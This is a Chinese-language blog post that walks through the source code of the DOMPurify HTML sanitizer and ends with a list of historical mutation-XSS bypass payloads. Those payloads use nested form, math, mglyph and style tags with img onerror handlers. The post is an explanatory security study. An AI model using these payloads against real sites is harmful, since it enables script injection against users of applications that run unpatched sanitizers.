DOMPurify源码小探究

Deen's blog

2021-05-19

0x00 DOMPurify 介绍

DOMPurify是一个开源的基于DOM的快速XSS净化工具。输入HTML元素，然后通过DOM解析递归元素节点，进行净化，输出安全的HTML。
github地址：https://github.com/cure53/DOMPurify
现在最新版本：2.2.8
官方介绍

0x01 常见使用

const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');

const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);

const clean = DOMPurify.sanitize("<img/src=x onerror=alert(1)>");

这段代码最后输出 <img src="x">

DOMPurify.sanitize 函数是最常见的用法，也可以接两个参数，第二个参数位为相关配置。可参考官方文档。

0x02 调试探究

DOMPurify使用到了ES6中语法，我打算通过webstorm使用node进行调试，所以还需要一些操作，如下（可参考：Node.js 中使用 ES6 中的 import / export 的方法大全）：

将此目录的下的代码 https://github.com/cure53/DOMPurify/tree/main/src 全部拉下来，后缀名改成mjs。

自己的main.js代码为

import createDOMPurify from "./DOMPurify-main/src/purify.mjs";
import JSDOM from 'jsdom';
const window = new JSDOM.JSDOM('').window;
const DOMPurify = createDOMPurify(window);
const html = "<img/src=x onerror=alert(1)>";
console.log(DOMPurify.sanitize(html));

node添加启动参数–experimental-modules

启动参数

0x03 sanitize代码跟进

主要代码

跟进分析santize函数主要代码：

const nodeIterator = _createIterator(IN_PLACE ? dirty : body);

/* Now start iterating over the created document */
while ((currentNode = nodeIterator.nextNode())) {
  /* Fix IE's strange behavior with manipulated textNodes #89 */
  if (currentNode.nodeType === 3 && currentNode === oldNode) {
    continue;
  }

  /* Sanitize tags and elements */
  if (_sanitizeElements(currentNode)) {
    continue;
  }

  /* Shadow DOM detected, sanitize it */
  if (currentNode.content instanceof DocumentFragment) {
   _sanitizeShadowDOM(currentNode.content);
  }

  /* Check attributes, sanitize if necessary */
  _sanitizeAttributes(currentNode);

  oldNode = currentNode;
}

oldNode = null;

dirty 为待净化的对象，即我们输入的数据。

首先通过_createIterator 函数以及while ((currentNode = nodeIterator.nextNode()))，会将输入元素转化成逐个的HTMLelement 元素。如 <img src=x><svg src=x>会转成img和svg两个元素
然后进入while的body进行操作，此时currentNode即img和svg元素。
会有两个净化操作，一个是_sanitizeElements，一个是_sanitizeAttributes 。
_sanitizeElements 函数，顾名思义，即净化标签
_sanitizeAttributes 即净化标签的属性

_sanitizeElements函数

/* Check if tagname contains Unicode */
if (stringMatch(currentNode.nodeName, /[\u0080-\uFFFF]/)) {
  _forceRemove(currentNode);
  return true;
}

/* Now let's check the element's type and name */
const tagName = stringToLowerCase(currentNode.nodeName);

标签名字包含unicode字符的，直接移除。然后标签名同一转成小写。

if (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName]) {
  /* Keep content except for bad-listed elements */
  if (KEEP_CONTENT && !FORBID_CONTENTS[tagName]) {
    const parentNode = getParentNode(currentNode) || currentNode.parentNode;
    const childNodes = getChildNodes(currentNode) || currentNode.childNodes;

    if (childNodes && parentNode) {
      const childCount = childNodes.length;

      for (let i = childCount - 1; i >= 0; --i) {
        parentNode.insertBefore(
          cloneNode(childNodes[i], true),
          getNextSibling(currentNode)
        );
      }
    }
  }

  _forceRemove(currentNode);
  return true;
}

过滤不在白名单的标签，白名单在tags.js。

export const html = freeze([
  'a',
  'abbr',
  'acronym',
  'address',
  'area',
  'article',
  'aside',
  'audio',
  'b',
  ......

/* Check whether element has a valid namespace */
if (currentNode instanceof Element && !_checkValidNamespace(currentNode)) {
  _forceRemove(currentNode);
  return true;
}

if (
  (tagName === 'noscript' || tagName === 'noembed') &&
  regExpTest(/<\/no(script|embed)/i, currentNode.innerHTML)
) {
  _forceRemove(currentNode);
  return true;
}

校验命名空间，曾经有过bypass，下面还有个对noscript标签的校验操作，感觉有点多余，因为不在白名单里，已经在上面就被remove了。

_sanitizeAttributes函数

首先不管是什么属性，都直接从当前currentNode remove。

if (hookEvent.forceKeepAttr) {
continue;
}

/* Remove attribute */
_removeAttribute(name, currentNode);

/* Did the hooks approve of the attribute? */
if (!hookEvent.keepAttr) {
continue;
}

然后根据标签名，还有属性名，属性的值进行一个_isValidAttribute 的判断。

const lcTag = currentNode.nodeName.toLowerCase();
if (!_isValidAttribute(lcTag, lcName, value)) {
continue;
}

如果是合法的attr，则调用setAttribute方法将attr进行还原。

关键的_isValidAttribute 函数。可以调试尝试绕过….nice try….

if (ALLOW_DATA_ATTR && regExpTest(DATA_ATTR, lcName)) {
  // This attribute is safe
} else if (ALLOW_ARIA_ATTR && regExpTest(ARIA_ATTR, lcName)) {
  // This attribute is safe
  /* Otherwise, check the name is permitted */
} else if (!ALLOWED_ATTR[lcName] || FORBID_ATTR[lcName]) {
  return false;

  /* Check value is safe. First, is attr inert? If so, is safe */
} else if (URI_SAFE_ATTRIBUTES[lcName]) {
  // This attribute is safe
  /* Check no script, data or unknown possibly unsafe URI
    unless we know URI values are safe for that attribute */
} else if (
  regExpTest(IS_ALLOWED_URI, stringReplace(value, ATTR_WHITESPACE, ''))
) {
  // This attribute is safe
  /* Keep image data URIs alive if src/xlink:href is allowed */
  /* Further prevent gadget XSS for dynamically built script tags */
} else if (
  (lcName === 'src' || lcName === 'xlink:href' || lcName === 'href') &&
  lcTag !== 'script' &&
  stringIndexOf(value, 'data:') === 0 &&
  DATA_URI_TAGS[lcTag]
) {
  // This attribute is safe
  /* Allow unknown protocols: This provides support for links that
    are handled by protocol handlers which may be unknown ahead of
    time, e.g. fb:, spotify: */
} else if (
  ALLOW_UNKNOWN_PROTOCOLS &&
  !regExpTest(IS_SCRIPT_OR_DATA, stringReplace(value, ATTR_WHITESPACE, ''))
) {
  // This attribute is safe
  /* Check for binary attributes */
  // eslint-disable-next-line no-negated-condition
} else if (!value) {
  // Binary attributes are safe at this point
  /* Anything else, presume unsafe, do not add it back */
} else {
  return false;
}

0x04 历史Bypass

可以在pull requests 和 releases的更新日志找到，如：
混淆命名空间绕过：https://github.com/cure53/DOMPurify/pull/495

更新日志

payloads：

<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<math><mtext><table><mglyph><style><img src=1 onerror=alert(1)>">
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(\'XSS\') src>">